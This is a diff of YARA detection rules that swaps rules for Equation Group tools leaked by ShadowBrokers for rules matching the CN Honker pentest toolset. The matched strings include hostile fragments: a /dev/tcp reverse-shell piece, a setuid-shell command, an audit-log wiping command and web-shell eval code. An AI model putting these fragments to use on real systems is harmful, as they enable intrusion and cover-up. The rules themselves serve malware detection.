-		$s4 = "J:\\chong\\nod\\Release\\SslMM.exe" fullword ascii
-		$s5 = "MM.exe" fullword ascii
-		$s6 = "network.proxy.ssl" fullword wide
-		$s7 = "PeekNamePipe" fullword ascii
-		$s8 = "Host: %ws:%d" fullword ascii
-		$s9 = "GET %dHTTP/1.1" fullword ascii
-		$s10 = "SCHANNEL.DLL" fullword ascii
+		$s1 = "$m=get_magic_quotes_gpc();$sid=$m?stripslashes($_POST[\"z1\"]):$_POST[\"z1\"];$u" wide
+		$s3 = "SETP c:\\windows\\system32\\cmd.exe " fullword wide
+		$s4 = "Ev al (\"Exe cute(\"\"On+Error+Resume+Next:%s:Response.Write(\"\"\"\"->|\"\"\"\"" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) ) or 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Emptycriss : FILE
+rule SIGNATURE_BASE_CN_Honker_Dedecms5_7 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file emptycriss"
+		description = "Sample from CN Honker Pentest Toolset - file dedecms5.7.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "658a0a2c-ea3a-5531-abea-54f0ed786e79"
-		date = "2017-04-08"
+		id = "b037862d-2821-5e96-996b-13ab241575ba"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L15-L30"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L614-L629"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fcfbe4a8a959491dfba9e5d958e43221d83a1e49dcf005872a1b71efb1226d99"
-		score = 75
+		hash = "f9cbb25883828ca266e32ff4faf62f5a9f92c5fb"
+		logic_hash = "57ff887906d3c5e7eafc900581eea7432c7a18364b0061d0e4deba0229663c65"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a698d35a0c4d25fd960bd40c1de1022bb0763b77938bf279e91c9330060b0b91"
 
 	strings:
-		$s1 = "./emptycriss <target IP>" fullword ascii
-		$s2 = "Cut and paste the following to the telnet prompt:" fullword ascii
-		$s8 = "environ define TTYPROMPT abcdef" fullword ascii
+		$s1 = "/data/admin/ver.txt" fullword ascii
+		$s2 = "SkinH_EL.dll" fullword ascii
 
 	condition:
-		( filesize < 50KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 830KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Scripme : FILE
+rule SIGNATURE_BASE_CN_Honker_Alien_Ee : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file scripme"
+		description = "Sample from CN Honker Pentest Toolset - file ee.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a2c5cd8b-c104-57d9-9ce2-a0b9a8dd9288"
-		date = "2017-04-08"
+		id = "03540f82-6662-55e3-97f8-38776271f08b"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L32-L48"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L631-L646"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5cffded6563bb3c94868f25e086be8d92837a7656707bf4e6a9e9f375d9ee7e0"
-		score = 75
+		hash = "15a7211154ee7aca29529bd5c2500e0d33d7f0b3"
+		logic_hash = "1f40f6c53e13aeb6b44c58f6e048a35cf3fd9fb956f26d70b3fe91bcac340ab5"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a1adf1c1caad96e7b7fd92cbf419c4cfa13214e66497c9e46ec274a487cd098a"
 
 	strings:
-		$x1 = "running \\\"tcpdump -n -n\\\", on the environment variable \\$INTERFACE, scripted" fullword ascii
-		$x2 = "Cannot read $opetc/scripme.override -- are you root?" ascii
-		$x3 = "$ENV{EXPLOIT_SCRIPME}" ascii
-		$x4 = "$opetc/scripme.override" ascii
+		$s1 = "GetIIS UserName and PassWord." fullword wide
+		$s2 = "Read IIS ID For FreeHost." fullword wide
 
 	condition:
-		( filesize < 30KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Crypttool : FILE
+rule SIGNATURE_BASE_CN_Honker_Smsniff_Smsniff : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file cryptTool"
+		description = "Sample from CN Honker Pentest Toolset - file smsniff.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e1f4e010-9c42-5b8a-8feb-2885b99307fe"
-		date = "2017-04-08"
+		id = "fef242d5-b274-5217-a5d1-1a6ec38d0fdd"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L50-L64"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L648-L663"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ae2d5eda038326376511450e1f5bd2bbf6264d23df013b005b322d70eb6266a0"
-		score = 75
+		hash = "8667a785a8ced76d0284d225be230b5f1546f140"
+		logic_hash = "6949f992d4734f18d9caffe83f2abccca0e0decef4169954518eed078d39e561"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "96947ad30a2ab15ca5ef53ba8969b9d9a89c48a403e8b22dd5698145ac6695d2"
 
 	strings:
-		$s1 = "The encryption key is " fullword ascii
-		$s2 = "___tempFile2.out" ascii
+		$s1 = "smsniff.exe" fullword wide
+		$s5 = "SmartSniff" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 200KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 267KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Dumppoppy : FILE
+rule SIGNATURE_BASE_CN_Honker_Happy_Happy : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file dumppoppy"
+		description = "Sample from CN Honker Pentest Toolset - file Happy.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c316aac3-bdd7-5187-8ae2-0a87c2f2d26f"
-		date = "2017-04-08"
-		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L66-L82"
+		id = "6e6c806d-e784-507f-b327-3b9f2510422b"
+		date = "2015-06-23"
+		modified = "2023-01-27"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L665-L683"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b6fb6a3799196375796da6f3a0169246145e668019dd692da67ca6f06d09c3dc"
-		score = 75
+		hash = "92067d8dad33177b5d6c853d4d0e897f2ee846b0"
+		logic_hash = "667cd6629ca49f2200fdc0a5eb28c77c412ca25313fd9a8afb77dedfa66d2fa1"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4a5c01590063c78d03c092570b3206fde211daaa885caac2ab0d42051d4fc719"
 
 	strings:
-		$x1 = "Unless the -c (clobber) option is used, if two RETR commands of the" fullword ascii
-		$x2 = "mywarn(\"End of $destfile determined by \\\"^Connection closed by foreign host\\\"\")" fullword ascii
-		$l1 = "End of $destfile determined by \"^Connection closed by foreign host"
+		$s1 = "<form.*?method=\"post\"[\\s\\S]*?</form>" fullword wide
+		$s2 = "domainscan.exe" fullword wide
+		$s3 = "http://www.happysec.com/" wide
+		$s4 = "cmdshell" fullword ascii
 
 	condition:
-		( filesize < 20KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 655KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Auditcleaner : FILE
+rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V3_0 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner"
+		description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v3.0.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "39ed798a-221d-5a4b-8809-db01d5241418"
-		date = "2017-04-08"
+		id = "7513a513-e8a3-58a8-8dd5-512ba33ff013"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L84-L102"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L685-L701"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "30a6ae9ce7d02c1d945d57eabf29f430ad4cdbc48dba5fe71654efc2c59fde08"
-		score = 75
+		hash = "fa47c4affbac01ba5606c4862fdb77233c1ef656"
+		logic_hash = "fa65de4a135072f4d9a5d5711a4e2833b9d4a268a2a37c33d17e4546d172b6f1"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8c172a60fa9e50f0df493bf5baeb7cc311baef327431526c47114335e0097626"
 
 	strings:
-		$x1 = "> /var/log/audit/audit.log; rm -f ." ascii
-		$x2 = "Pastables to run on target:" ascii
-		$x3 = "cp /var/log/audit/audit.log .tmp" ascii
-		$l1 = "Here is the first good cron session from" fullword ascii
-		$l2 = "No need to clean LOGIN lines." fullword ascii
+		$s1 = "http://127.0.0.1/1.exe" fullword wide
+		$s2 = ":Rices  Forum:T00Ls.Net  [4 Fucker Te@m]" fullword wide
+		$s3 = "SkinH_EL.dll" fullword wide
 
 	condition:
-		( filesize < 300KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Reverse_Shell : FILE
+rule SIGNATURE_BASE_CN_Honker_Netfuke_Netfuke : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file reverse.shell.script"
+		description = "Sample from CN Honker Pentest Toolset - file NetFuke.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0e9b8ff2-2187-5b61-a086-2ad4ff1a3b10"
-		date = "2017-04-08"
+		id = "833da5c7-e562-50e9-a2a9-54c36b0d1f61"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L104-L118"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L703-L718"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6dc388fecbf606b19c04626d64f5fe4184f07c2a1597a6f8337aa4a827b2d89b"
-		score = 75
+		hash = "f89e223fd4f6f5a3c2a2ea225660ef0957fc07ba"
+		logic_hash = "86f6040b743b17fb300498b02a202d1a9090054a30d490f082b116d799c4bdb2"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d29aa24e6fb9e3b3d007847e1630635d6c70186a36c4ab95268d28aa12896826"
 
 	strings:
-		$s1 = "sh >/dev/tcp/" ascii
-		$s2 = " <&1 2>&1" fullword ascii
+		$s1 = "Mac Flood: Flooding %dT %d p/s " fullword ascii
+		$s2 = "netfuke_%s.txt" fullword ascii
 
 	condition:
-		( filesize < 1KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1840KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Tnmunger : FILE
+rule SIGNATURE_BASE_CN_Honker_Manualinjection : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file tnmunger"
+		description = "Sample from CN Honker Pentest Toolset - file ManualInjection.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c95dd24f-ffc9-5e58-aed7-205daa001b8c"
-		date = "2017-04-08"
+		id = "f0899003-824f-56ed-b653-9f7a77b9ec6a"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L120-L134"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L720-L735"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ddb957ca9350288d0fa98ba20847a99dcba931b5a03d0ae94cd3409f82f728eb"
-		score = 75
+		hash = "e83d427f44783088a84e9c231c6816c214434526"
+		logic_hash = "fe8eba3b79f5bc4cf820ff51816c3f2a27d6ed8f6ab3963f88a3232c9a4b5c1e"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1ab985d84871c54d36ba4d2abd9168c2a468f1ba06994459db06be13ee3ae0d2"
 
 	strings:
-		$s1 = "TEST: mungedport=%6d  pp=%d  unmunged=%6d" fullword ascii
-		$s2 = "mungedport=%6d  pp=%d  unmunged=%6d" fullword ascii
+		$s0 = "http://127.0.0.1/cookie.asp?fuck=" fullword ascii
+		$s16 = "http://Www.cnhuker.com | http://www.0855.tv" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 10KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Ys_Ratload : FILE
+rule SIGNATURE_BASE_CN_Honker_Cncert_Ccdoor_CMD : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file ys.ratload.sh"
+		description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "abd120e7-23f8-530e-b21e-c50a2b571332"
-		date = "2017-04-08"
+		id = "ddd328a8-7ad8-5b26-9deb-3e5da801cd1b"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L136-L151"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L737-L754"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "82d00b7eecdb60911ecd933387eeb2ce4eec9721993beee60247d1273ad3368f"
-		score = 75
+		hash = "1c6ed7d817fa8e6534a5fd36a94f4fc2f066c9cd"
+		logic_hash = "3c068c3d21de8c071b3eec354f03423d4902ef0156bb9dcad370cf688bc03426"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a340e5b5cfd41076bd4d6ad89d7157eeac264db97a9dddaae15d935937f10d75"
 
 	strings:
-		$x1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"" fullword ascii
-		$x2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii
-		$x3 = "CALLBACK_PORT=32177" fullword ascii
+		$s2 = "CnCerT.CCdoor.CMD.dll" fullword wide
+		$s3 = "cmdpath" fullword ascii
+		$s4 = "Get4Bytes" fullword ascii
+		$s5 = "ExcuteCmd" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 3KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 22KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Eh_1_1_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Termsrvhack : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file eh.1.1.0.0"
+		description = "Sample from CN Honker Pentest Toolset - file termsrvhack.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a6f0ec1f-b0e5-5913-970d-9cdadf647c44"
-		date = "2017-04-08"
+		id = "4fd582a1-3c6d-57a1-bba0-f775bb61ef00"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L153-L168"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L756-L771"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d0972bb57076606b3c84f3cbbb0be85cd5663c7cd6f6d9f09a2991cb6532bfa9"
-		score = 75
+		hash = "1c456520a7b7faf71900c71167038185f5a7d312"
+		logic_hash = "ef0b9965e2d419230a7a8425674edb356347d1e41538d19fc67f8b0fbc69091f"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0f8dd094516f1be96da5f9addc0f97bcac8f2a348374bd9631aa912344559628"
 
 	strings:
-		$x1 = "usage: %s -e -v -i target IP [-c Cert File] [-k Key File]" fullword ascii
-		$x2 = "TYPE=licxfer&ftp=%s&source=/var/home/ftp/pub&version=NA&licfile=" ascii
-		$x3 = "[-l Log File] [-m save MAC time file(s)] [-p Server Port]" fullword ascii
+		$s1 = "The terminal server cannot issue a client license.  It was unable to issue the" wide
+		$s6 = "%s\\%s\\%d\\%d" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 100KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1052KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Evolvingstrategy_1_0_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_IIS6_Iis6 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file evolvingstrategy.1.0.1.1"
+		description = "Sample from CN Honker Pentest Toolset - file iis6.com"
 		author = "Florian Roth (Nextron Systems)"
-		id = "465f709b-1791-5b36-836b-7a0c08bb9b88"
-		date = "2017-04-08"
+		id = "f5d49cbd-1aec-5126-ab5d-83e485fa6869"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L170-L188"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L773-L790"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "87d25f1a4ca4a75292ab6cdcd1a79890c4475c2a9b34761ed92988bd517b4497"
-		score = 75
+		hash = "f0c9106d6d2eea686fd96622986b641968d0b864"
+		logic_hash = "51b2fdae6437d64661f20342711d516201740eceb2273704a6e415be2cac54f6"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fe70e16715992cc86bbef3e71240f55c7d73815b4247d7e866c845b970233c1b"
 
 	strings:
-		$s1 = "chown root sh; chmod 4777 sh;" fullword ascii
-		$s2 = "cp /bin/sh .;chown root sh;" fullword ascii
-		$l1 = "echo clean up when elevated:" fullword ascii
-		$x1 = "EXE=$DIR/sbin/ey_vrupdate" fullword ascii
+		$s0 = "GetMod;ul" fullword ascii
+		$s1 = "excjpb" fullword ascii
+		$s2 = "LEAUT1" fullword ascii
+		$s3 = "EnumProcessModules" fullword ascii
 
 	condition:
-		( filesize < 4KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toast_V3_2_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Struts2_Catbox : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file toast_v3.2.0.1-linux"
+		description = "Sample from CN Honker Pentest Toolset - file catbox.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "776014ae-be94-5d81-bceb-fefb67ee1994"
-		date = "2017-04-08"
+		id = "24df7a11-5ec4-5e7b-86f6-6195ca01b8f9"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L190-L205"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L792-L807"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a505eaafb6882e2701fe0a9b8712f85c1073d83291436eeaa7f4c52876d12359"
-		score = 75
+		hash = "ee8fbd91477e056aef34fce3ade474cafa1a4304"
+		logic_hash = "20bda5c918ea38810603528a20f3406ec4e79ce999681649e8e806bf549b5359"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2ce2d16d24069dc29cf1464819a9dc6deed38d1e5ffc86d175b06ddb691b648b"
 
 	strings:
-		$x2 = "Del --- Usage: %s -l file -w wtmp -r user" fullword ascii
-		$s5 = "Roasting ->%s<- at ->%d:%d<-" ascii
-		$s6 = "rbnoil -Roasting ->" fullword ascii
+		$s6 = "'Toolmao box by gainover www.toolmao.com" fullword ascii
+		$s20 = "{external.exeScript(_toolmao_bgscript[i],'javascript',false);}}" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 50KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 8160KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Sshobo : FILE
+rule SIGNATURE_BASE_CN_Honker_Getlsasrvaddr : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file sshobo"
+		description = "Sample from CN Honker Pentest Toolset - file getlsasrvaddr.exe - WCE Amplia Security"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b9392aec-34a8-5ad2-b3fd-eea907d19701"
-		date = "2017-04-08"
-		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L207-L223"
+		id = "fa0c0376-c5c3-5b48-b03e-86cefb547479"
+		date = "2015-06-23"
+		modified = "2022-12-21"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L809-L826"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "90c892e06ccedb6a3208d728e9f3c27c14bbe1b4c13b63d4a350bbbf38efbe9d"
-		score = 75
+		hash = "a897d5da98dae8d80f3c0a0ef6a07c4b42fb89ce"
+		logic_hash = "e626724430d0b74aee52783dd5abdb8ccc7b951c56041e5c166b78b7370bc402"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c7491898a0a77981c44847eb00fb0b186aa79a219a35ebbca944d627eefa7d45"
 
 	strings:
-		$x1 = "Requested forwarding of port %d but user is not root." fullword ascii
-		$x2 = "internal error: we do not read, but chan_read_failed for istate" fullword ascii
-		$x3 = "~#  - list forwarded connections" fullword ascii
-		$x4 = "packet_inject_ignore: block" fullword ascii
+		$s8 = "pingme.txt" fullword ascii
+		$s16 = ".\\lsasrv.pdb" ascii
+		$s20 = "Addresses Found: " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 600KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Magicjack_V1_1_0_0_Client_1_1_0_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Ms10048_X64 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file magicjack_v1.1.0.0_client-1.1.0.0.py"
+		description = "Sample from CN Honker Pentest Toolset - file ms10048-x64.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "008cb5cf-1d2d-5312-9474-2f93db190974"
-		date = "2017-04-08"
+		id = "b65b0bad-d74c-5e7a-a613-69ef80585c23"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L225-L239"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L828-L843"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "44e853b8d148f84107d29449aa44b2e52226c9d2f397c019aa0f1d347863e388"
-		score = 75
+		hash = "418bec3493c85e3490e400ecaff5a7760c17a0d0"
+		logic_hash = "49addce6bef7588bf7683836a54bec6a2a646ecc3f7547083174d2255454cdf0"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1"
 
 	strings:
-		$x1 = "result = self.send_command(\"ls -al %s\" % self.options.DIR)" fullword ascii
-		$x2 = "cmd += \"D=-l%s \" % self.options.LISTEN_PORT" fullword ascii
+		$s1 = "[ ] Creating evil window" fullword ascii
+		$s2 = "[+] Set to %d exploit half succeeded" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 80KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 125KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Packrat : FILE
+rule SIGNATURE_BASE_CN_Honker_Logcleaner : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file packrat"
+		description = "Sample from CN Honker Pentest Toolset - file LogCleaner.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4c0619c4-728f-591f-aa02-7c28f1f42fd1"
-		date = "2017-04-08"
+		id = "63ec5e47-9f3e-547a-bbff-cac8b27ac8f7"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
